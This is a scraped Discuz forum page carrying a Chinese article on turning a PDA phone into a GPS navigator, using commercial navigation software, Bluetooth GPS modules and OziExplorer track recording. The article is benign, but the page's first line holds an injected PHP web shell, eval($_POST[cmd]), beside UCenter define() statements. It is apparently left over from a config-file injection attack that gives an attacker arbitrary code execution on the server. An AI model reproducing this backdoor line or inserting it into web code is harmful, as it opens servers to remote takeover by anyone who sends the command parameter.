');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 實話實說 PDA手機GPS導航都能怎麼玩 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

實話實說 PDA手機GPS導航都能怎麼玩

  如今買一部智能手機不再是一件奢侈的事情,智能手機功能多、系統開放性高,軟件資源豐富,價格也比較容易接受。筆者今天就為大家介紹一下PDA手機的GPS應用具體有哪些方式。

  首先就是導航功能了,因為目前市場上大多數車載GPS產品都使用的是微軟的操作系統,其中有Windows CE、Windows Mobile等等,其中的導航軟件也基本支持以上操作系統,比如道道通、凱立德、Route66、導世通等等,所以如果想實現PDA上的GPS導航,可以考慮購買一款導航軟件。如果PDA本身並沒有內置GPS芯片,還需要購買藍牙GPS模塊,一般的藍牙GPS模塊價格都很便宜,幾百元就可以解決。



華碩PDA運行城際通導航軟件截圖

  所以說如果你手中有一部PDA,想實現導航只需要購買導航軟件與相應的藍牙GPS模塊即可。

  其次由於Windows Moblie系統的開放性比較高,許多的國外商業軟件或網友製作的軟件也可以運行,所以這個平台下的GPS相關軟件十分豐富。其中最有名的要數OziExplorer了。我們之前有篇文章曾經介紹過這款電子地圖軟件,在該平台下運行OziExplorer可以方便的記錄航跡航點,也可以通過網友DIY的地圖進行導航使用。對於去一些偏僻的地方或者一些需要重要記錄的路線,使用OziExplorer是最方便不過的了。記錄的航跡不僅可以在Google Earth上查看,還可以通過網絡分享給其他人。



OziExplorer CE運行截圖

  您看,如果手中有部PDA何必專門去購買車載GPS呢,完全可以自己定制一部功能強大的導航系統。

技巧:OziExplorer經典地圖軟件入門
返回列表